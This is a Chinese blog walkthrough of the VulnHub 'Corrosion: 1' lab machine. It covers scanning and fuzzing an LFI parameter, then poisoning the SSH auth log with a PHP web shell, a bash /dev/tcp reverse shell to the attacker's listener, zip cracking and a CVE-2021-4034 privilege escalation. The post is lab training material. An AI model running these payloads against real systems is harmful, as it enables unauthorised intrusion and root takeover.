vulnhub-Corrosion: 1

最新推荐文章于 2024-01-17 12:22:07 发布
最新推荐文章于 2024-01-17 12:22:07 发布
阅读量681 收藏
点赞数 1
分类专栏: vulnhub 文章标签: 安全 linux 网络 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43006864/article/details/124647609
版权

Corrosion: 1 ~ VulnHub

注:因为重启过,所以IP可能不一样。不是一次做完的。

靶机:

攻击机:

Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux

信息收集:

nmap 192.168.1.1/24  

由于这个靶机没有给出ip地址,这里需要自己扫描,这里根据他开放的22和80端口判断,192.168.1.102这台机是靶机。因为我这就这么几台电脑。

继续扫描

nmap -sS -sV -A -p- 192.168.1.102

基本上就这么点信息了。访问一下80端口。

平平无奇Apache,扫一下目录。

 一一打开一下,

这里看到了提示,说是更改认证日志的权限,更改22端口为7672,设置管理员为phpMyAdmin。

 

 

 其他几个没啥收获,继续从提示页开始往下走,这里按大佬的说法就是存在认证日志的文件包含,要fuzz一下具体的参数,

ffuf -u 'http://192.168.1.102/blog-post/archives/randylogs.php?FUZZ=/var/log/auth.log' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -fs 0

直接fuff。

 fuff出来了这个。

http://192.168.1.102/blog-post/archives/randylogs.php?file=/var/log/auth.log

再测试一下登陆失败会不会记录进去。

 

 

 

 

 

看到记录了成功了,然后尝试写入一句话木马。

  ssh '<?php system($_REQUEST['cmd']);?>'@192.168.1.117

view-source:http://192.168.1.117/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig

再进行测试,看到可以成功进行命令执行,接下来就nc进行连接就行了。

 

再然后,大家就懂了,菜刀啊,冰蝎啊,冲就完事了,这里我就不切系统了,直接弹到nc里吧,

开启监听:nc -lvvp 4444

 

bash -c 'bash -i >& /dev/tcp/192.168.1.113/4444 0>&1'

这是我要弹的语句,这里直接弹是没反应的,要先进行url编码。

bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.113%2F4444%200%3E%261%27

view-source:http://192.168.1.117/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.113%2F4444%200%3E%261%27

弹成功,开始提权。

先随便翻翻,

 看到了backups

看到了用户的备份,

直接解压是没啥作用的,看来是没有这个命令

 

测试了一下,好像是有python3的,直接python搭建http服务,进行下载。也可以用nc。

python3 -m http.server 8888

 

需要密码,爆破一下,

这里用的fcrackzip,

安装的话:apt-get install fcrackzip

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt /home/kali/vulnhub/Corrosion:1/user_backup.zip

拿到密码,解压一下。

看到了密码本,登陆randy

 

查看一下信息,

 

看到了这个。去看看。

 

看看这个py文件。

试试能不能改一下这个py文件来提权,

没啥利用,

写入提权文件,这里的py没法改了,但是又得用同名的,就写入c代码。 这里不能用vim,就用nano。

gcc编译一下。

gcc easysysinfo.c -o easysysinfo

再sodu 运行一下。发现成功提权到root用户。

拿到flag。

解法二:这里提权还有一种做法,是利用cat提权。但我给/bin/bash赋权的时候一直赋不了s权限,后续再研究下。

解法三:

大家还记得之前公布的linux Polkit权限提升漏洞CVE-2021-4034吧,这里,的话,咱们这个靶机是2021年的,盲猜肯定存在这个漏洞。所以直接把exp复制粘贴进去。

randy@corrosion:~/tools$ nano polkit.c
randy@corrosion:~/tools$ gcc polkit.c -o polkit
randy@corrosion:~/tools$ ./polkit

完成提权,这里exp大家可以参考。

GitHub - signfind/CVE-2021-4034: CVE-2021-4034

 

 

 

 

 

 

 

 

 

 

 

 

 

 

大西瓜的安全之路
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
VulnHub靶场-Corrosion:1
hxync的博客
08-14 639
靶场下载地址:Corrosion:1 下载好之后导入virtualbox启动 Kali IP地址: Nmap扫描靶机IP: Nmap扫端口: 浏览器访问80端口: 没发现什么有用的信息 Dirbuster扫目录: 访问一下扫到的内容,发现了txt文件里似乎有提示信息 推测是在登录日志中可能存在文件包含 Fuzz找下参数: ssh登录尝试一下: 发现确实存在文件包含,上传一句话木马: 命令执行成功: 反弹shell 先监听端口 url编码: 成功拿到shell 在/var/ba
vulnhub靶场——CORROSION:1
Czheisenberg的博客
02-16 2048
准备 攻击机:kali 靶机: CORROSION: 1 NAT 192.168.91.0 网段 下载连接: https://www.vulnhub.com/entry/corrosion-1,730/ 信息搜集与利用 主机发现 python3 ping.py -H 192.168.91.0/24 如图所示得到目标靶机IP地址: 192.168.91.188 端口扫描 如图所示只开放了 22,80 两个端口。 HTTP http://192.168.91.188/ 目录扫描 挨个访问上面的路径:
VULNHUB靶机】Corrosion: 1
travelnight的博客
03-23 3429
在家隔离,好久没玩靶机了,现在来整一个。
vulnhub靶场,CORROSION: 1
kukudeshuo的博客
01-10 1815
vulnhub靶场,CORROSION: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/ 攻击机:kali(192.168.109.128) 靶机:CORROSION: 1(192.168.109.192) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取目标靶机root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192
vulnhub靶机-Corrosion
臭nana的博客
08-16 701
1、找到靶机ip:192.168.162.131 nmap -sn 192.168.162.0/24 2、扫描靶机端口,发现开放22和80端口 ┌──(root????cracer)-[~] └─# nmap -A -p- 192.168.162.131 Starting Nmap 7.91 ( https://nmap.org ) Nmap scan report for 192.168.162.131 Host is up (0.00067s latency).
腐蚀matlab代码-Corrosion:用塔菲尔外推法计算腐蚀速率
05-22
在提供的"Corrosion-master"压缩包中,可能包含了实现这些步骤的Matlab源代码,如数据读取、预处理、图形绘制、曲线拟合和结果计算等函数。通过阅读和理解这些代码,可以学习到如何在实际项目中应用塔菲尔外推法进行...
ISO 11199-1-2021
03-19
ISO 11199-1-2021
corrosion:Eclipse Corrosion-Eclipse IDE中的Rust版本
05-04
Corrosion是Eclipse IDE的Rust开发插件,通过与Rust Analyzer语言服务器,CargoRunner和gdb调试器集成,提供了丰富的版本体验。 下载/安装 腐蚀 从成熟的Eclipse IDE进行Rust开发。 或者 在您的计算机上正确安装了...
Algorithm-Predict-external-corrosion-on-oil-and-gas-pipelines.zip
09-17
Algorithm-Predict-external-corrosion-on-oil-and-gas-pipelines.zip,微软在总部与dnv-gl进行了为期五天的黑客大会,重点是使用机器学习预测管道的外部腐蚀。,算法是为计算机程序高效、彻底地完成任务而创建的一组...
Corrosion:使用机器学习预测腐蚀速率
05-10
在"Corrosion-master"这个压缩包文件中,可能包含了项目的源代码、数据集、预处理脚本、模型训练和评估的结果等。通过深入研究这些文件,我们可以进一步了解模型的具体实现细节和预测效果。此外,这些资源也可能包含...
【渗透测试】Vulnhub Corrosion : 1
最新发布
qq_51143406的博客
01-17 967
chmod +s /bin/bash 是设置bash的setuid位,让用户在运行bash的过程中暂时获得拥有者的权限,运行easysysinfo时调用的是我们写的cat,就会让bash的setuid被设置,随后就可以以特权身份运行bash。看了其他师傅们的文章,这里是有一个文件包含漏洞,但是我们不知道传什么参,因此我们fuzz以下,参数值就设置为。,查看一下,发现easysysinfo会调用cat,而且没有使用绝对路径,那么我们就可以重写一个。开放了22和80端口,访问80端口,可以正常访问。
VulnHub日记(四):Corrosion
Dawn_Xi的博客
08-13 299
靶机介绍 难度:容易 对于初学者来说,这是一个简单的盒子,但不太容易。祝你好运 提示:枚举属性 虚拟机链接:https://www.vulnhub.com/entry/corrosion-1,730/ 开始练习 本机ip:192.168.56.102 使用nmap找出靶机ip:192.168.56.105 nmap -sS -sV 192.168.56.0/24 查看开启端口及服务 nmap -A -p- 192.168.56.105 看到开启80和22端口,先使用浏览器访问.
CORROSION: 1
qq_60481227的博客
10-30 109
CORROSION系列的靶机打靶记录,第一台靶机,难度:easy
看完这篇 教你玩转渗透测试靶机vulnhubCorrosion:1
Aluxian_的博客
06-24 1748
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Easy。
vulnhub靶机-Corrosion:2
臭nana的博客
05-03 649
1、找到靶机ip:192.168.1.106 nmap -sn 192.168.1.0/24 2、扫描靶机端口,开放22、80和8080端口
vulnhub刷题记录(CORROSION: 1)
ailx10
08-28 296
英文名称:CORROSION: 1中文名称:腐蚀:1发布日期:2021 年 7 月 31 日难度:容易描述:一个适合初学者的简单盒子,但不太容易。祝你好运。提示:枚举属性。下载地址:https://www.vulnhub.com/entry/corrosion-1,730/ 1、开机(用户名 randy)开机2、主机发现(192.168.199.118)主机发现3、端口扫描(22、80)端口扫描...
Kali Linux系统正确安装指南教程(三 )完结 更新到2020 Debian 5.4.13 伪装 win10
EdisonJH的博客
02-20 3177
kail 2020 安装指南 汉化版 ----win10伪装 虚拟机 Vm 镜像ios 我用的是kail ios镜像 我们拿Torrent 迅雷下载 10几分钟就下载好了 这里关于版本我们很难选择,我查过几个博客发现 (live)、(install) 等等 都是桌面不一样,其余的都是一样、 安装和我上一篇文章一样 安装镜像 其中安装的时候和我上一篇没什么大差别,就是有一个不同...
Vulnhub靶机:Corrosion1
qq_48904485的博客
01-09 472
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:corrosion:1(10.0.2.12)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/
debain(SMP Debian 3.16.7-ckt25-2 (2016-04-08) x86_64 GNU/Linux)安装注意点及配置
weixin_30680385的博客
05-18 363
1. 无线网卡驱动准备 安装时准备好驱动(我的Dell6430配置intel u系列)(下载驱动并解压放在可识别存储设备上) 2-18来自“千里之行始于足下” 2. 安装和配置 sudo 切换到root用户 apt-get install sudo 配置 /etc/sudoers,使你的帐户具有sudo权限 root ALL=(ALL:ALL)...
NACE MR0175/ISO 15156-1: 选择石油天然气生产中H2S环境抗裂材料的通用原则
NACE MR0175/ISO 15156-1标准,全称为"Petroleum and Natural Gas Industries - Materials for Use in H2S-containing Environments in Oil and Gas Production - Part 1: General Principles for Selection of ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大西瓜的安全之路

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值